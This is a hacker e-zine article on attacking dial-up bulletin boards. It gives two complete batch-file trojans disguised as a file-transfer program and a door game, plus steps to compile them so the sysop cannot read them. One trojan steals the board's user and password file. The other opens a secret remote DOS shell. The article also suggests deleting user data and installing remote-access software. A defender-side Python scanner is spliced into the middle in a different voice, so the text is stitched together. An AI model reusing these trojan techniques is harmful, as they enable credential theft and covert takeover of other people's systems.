Computer Terror and Destruction Issue #1 - BBS Infiltration
By the Chamelion
This article starts off the first issue of Computer Terror and Destruction. Each issue will deal with a particular area of computer destruction, dealing mostly with different ways to fuck over computers.
After taking a look at some of the better phreak/hack BBS systems, I haven't been able to find any good material on BBS destruction. Most of the information I have gathered is rather simple and outdated, and dealt mostly with hitting Control-Break a lot. Well, as most BBS systems are no longer written in BASIC, this is a rather stupid thing to try doing. (Although it still works on some lame BBS games.) One of the best methods of breaking into a BBS is uploading a trojan horse. The easiest language to create a trojan in is batch. However, the sysop can easily view the program before he runs it, and thus the trojan is discovered. But using a new program called BAT2EXEC, you can convert your trojan batch file to a COM file, which is harder to read.
(Note: If BAT2EXEC.COM isn't in the archive file, it was created by PC Magazine and can be found on many shareware BBSs.)
To compile a batch file, edit the batch file with EDLIN, then type in BAT2EXEC.COM followed by the batch file name. It will convert the file to COM format. This is nice for speeding up large batch files, etc. But there is another important reason which makes this program useful. Let's say that there is this lamer BBS in your area, and you want to mess with the BBS. Here, you have two choices. You can steal the USERS.BBS listing, which includes all users and their passwords. Or, you can set up his BBS so you can shell to his DOS to do whatever you want. What you want to do is set up a Trojan Horse on the system to do whatever you want. The best way to do this is to give the sysop software that he is likely to use, secretly booby-trapped to do what you want.
OK, the next section deals with how to steal the USERS.BBS listing, which includes all user names and passwords. The second section is all about how to get access to the system's DOS via modem. I'd read the first section, as it includes lots of information you need to know.
SECTION #1 - How to get a copy of the user file.
First, get the docs for the type of software the target BBS operates with, and find out the name of the user listing. USERS.BBS works for Remote Access, but PCBoard, etc. use different names. Now, get some utility or game that the BBS sysop is sure to run on his system. Now, look at the files that are included in the utility (or game).
For example, DSZ includes-
and a bunch of other shit. So, first rename DSZ.EXE to DSZ.DAT. Then, using EDLIN (for some reason, you need to use EDLIN for it to work with BAT2EXEC. This is probably because in EDLIN you hit Control-C to end the text, and BAT2EXEC looks for this. So, you can type everything but the last two lines in a text editor, and finish it off with EDLIN, using Control-C to stop entering text), make a batch file called DSZ.BAT. It should look something like this.
@ECHO OFF
IF EXIST C:\RA\USERS.BBS GOTO COPY
REM Checks to see if the USERS.BBS listing is there.
GOTO DSZ
:COPY
IF EXIST D:\FILES\UPLOAD\GAME.ZIP GOTO DSZ
REM Sets it to only copy once.
REM Now we want to copy the USERS.BBS listing to the new file
REM directory, under the name of GAME.ZIP
COPY C:\RA\USERS.BBS D:\FILES\UPLOAD\GAME.ZIP >DMP.DMP
REM DMP.DMP is used to redirect the screen output
REM Now is the tricky part. You need to have FILES.BBS listing
REM add TOOBIN1.ZIP to its listing of on-line files.
COPY DSZ.DMP + D:\FILES\UPLOAD\FILES.BBS D:\FILES\UPLOAD\FILES.BAK > DMP.DMP
REM D:\files\upload will change depending on the sub-dir setup.
REM DSZ.DMP, a file you will need to make, is appended to
REM a listing of all available files.
COPY D:\FILES\UPLOAD\FILES.BAK D:\FILES\UPLOAD\FILES.BBS >DMP.DMP
DEL DMP.DMP
:DSZ
REM Now we want to run DSZ like normal.
REN DSZ.DAT DZ.EXE
REM Turn back on monitor
DSZ %1 %2 %3 %4 %5 %6 %7
REN DZ.EXE DSZ.DAT
REM All done!

Now, run BAT2EXEC DSZ.BAT to create DSZ.COM.
OK, remember how I said you need to add USERS.BBS (which was renamed GAME.ZIP) to the FILES.BBS listing? Now create a file called DSZ.DMP that looks like this.
GAME.ZIP Game Disk #1, cracked by INC!
(Description should start on 14th line)
Now I will recap what will happen when you have everything set up. The sysop sees that someone (you) has uploaded the newest version of DSZ Z-Modem, so he installs it. The files he places in his protocol directory are:
DSZ.COM  -Your batch file changed into COM.
DSZ.DAT  -The real DSZ
DSZ.DOC  -Docs to DSZ
DSZ.DMP  -Has text that says "game.zip"
Now, he gets his BBS software to run DSZ.COM, which he thinks is DSZ. Because it's a COM file, he can't tell what it does, which is the whole reason for using BAT2EXEC.COM anyway. There is no way he can tell what DSZ.COM does. DSZ.COM runs, and copies the USERS.BBS listing to the new files directory under the name GAME.ZIP. Then, DSZ.DMP is added to the FILES.BBS listing, so when you do a listing of new files, it will be there. Then DSZ.DAT is renamed to DZ.EXE. DZ.EXE is then run. Then DZ.EXE is renamed back to DSZ.DAT. Now, all you have to do is download GAME.ZIP, and you are off!
Of course, it is even easier to delete Users.BBS, but that's not as much phun.
OK, now let's say you want to shell to the BBS system's DOS instead of copying the user listing. Do this when the sysop is out of town, etc., so he doesn't show up and see what you are doing. This time, the example uses Global War, a popular BBS game.
Rename Gwar.exe GW.DAT
@ECHO OFF
IF %5==JACK GOTO FIRST
IF %5==jack goto first
REM Replace Jack with your first name
GOTO RUN
:first
IF %6==RIPPER GOTO LAST
if %6==ripper GOTO LAST
REM Replace Ripper with your last name
GOTO RUN
:LAST
CTTY COM1
REM Choose the com port that the BBS uses!
c:\command.com
REM Just type "Exit" to end the shell
goto end
:run
ren gw.dat gw.exe
gw.exe %1 %2 %3 %4 %5 %6 %7
ren gw.exe gw.dat
:END
Now, when you give the sysop the file and he installs it, whenever you try to run GWAR, you will be placed in a DOS shell! Just remember several things. Don't try to directly import any of these files. You will need to make modifications, depending on the BBS type and several other parameters. For example, GWAR is not always run from the command line, and may search a file for the user name. It is important that no one is around when you do this. It's a good idea to mess around as much as possible before you upload something.
Also, when you are in that DOS shell, don't run any graphic applications. The best way to do it is to upload a simple gateway program like PC Anywhere. Once you are in DOS, go unzip it and then run it. The best thing to do is be completely original in your style of creating trojan horses; always use a bogus name or alias.
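As an added example from the sysop's side (not code from the article, nor from BAT2EXEC or DSZ), a Python check to run over a protocol or door directory before installing an upload: it looks for the DOS command text that wrappers like the two above carry. It assumes a batch-to-COM wrapper keeps its commands readable inside the binary; `scan_blob`, `is_suspicious` and `scan_directory` are names chosen here.

```python
"""Added defender-side check, not code from the article or from BAT2EXEC:
flag uploaded .COM/.EXE files that carry readable DOS command text.
Assumption: a batch-to-COM wrapper stores its commands in the clear, so a
plain byte scan reveals them; packed or encrypted binaries need other checks."""
import re
from pathlib import Path

# Indicator patterns drawn from the wrapper scripts quoted in the article.
INDICATORS = {
    "CTTY": rb"\bCTTY\s+COM\d",                        # console handed to a serial port
    "COMMAND.COM": rb"COMMAND\.COM",                    # command interpreter spawned
    "USERS.BBS": rb"USERS\.BBS",                        # BBS user/password file touched
    "FILES.BBS": rb"FILES\.BBS",                        # file-area listing rewritten
    "@ECHO OFF": rb"@ECHO\s+OFF",                       # batch preamble inside a binary
    "REN .DAT->.EXE": rb"\bREN\s+\S+\.DAT\s+\S+\.EXE\b",  # real program parked as .DAT
}
PATTERNS = {name: re.compile(pat, re.IGNORECASE) for name, pat in INDICATORS.items()}

def scan_blob(data: bytes) -> list[str]:
    """Return the names of all indicators present in the raw bytes, sorted."""
    return sorted(name for name, rx in PATTERNS.items() if rx.search(data))

def is_suspicious(data: bytes, threshold: int = 2) -> bool:
    """Two or more indicators in one binary is worth a manual look."""
    return len(scan_blob(data)) >= threshold

def scan_directory(directory: str) -> dict[str, list[str]]:
    """Scan every .COM/.EXE below a directory; maps file path to its hits."""
    hits: dict[str, list[str]] = {}
    for path in Path(directory).rglob("*"):
        if path.is_file() and path.suffix.upper() in (".COM", ".EXE"):
            found = scan_blob(path.read_bytes())
            if found:
                hits[str(path)] = found
    return hits

# Constructed samples (not real files): a wrapper-style binary with batch
# text in the clear, and a benign transfer driver for comparison.
WRAPPER_SAMPLE = (b"\xb4\x09\xba\x00\x01\xcd\x21"
                  b"@ECHO OFF\r\nren gw.dat gw.exe\r\nCTTY COM1\r\nc:\\command.com\r\n")
CLEAN_SAMPLE = b"MZ\x90\x00\x03\x00" + b"DSZ Z-Modem transfer driver\r\n"

if __name__ == "__main__":
    for label, blob in (("wrapper", WRAPPER_SAMPLE), ("clean", CLEAN_SAMPLE)):
        verdict = "suspicious" if is_suspicious(blob) else "ok"
        print(f"{label}: {scan_blob(blob)} -> {verdict}")
```

A hit on a freshly uploaded protocol or door binary is a reason to open it in a viewer and compare it against the vendor's original before it ever runs on the board.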
BTW, I can be reached via bitnet at
email@example.com ...psuvax1!psuecl!hiway!chamelio ...psuvax1!hogbbs!hiway!chamelio
Or on Lost Dungeon 1 gig! (212)
(I do not accept any responsibility for what you may do (or have done to you) with this information. Use at your own risk.)
Greets go out to Electric Monk, The Pope, Zolten Coldia, and Road Master.
EGBT is coming to a computer near you!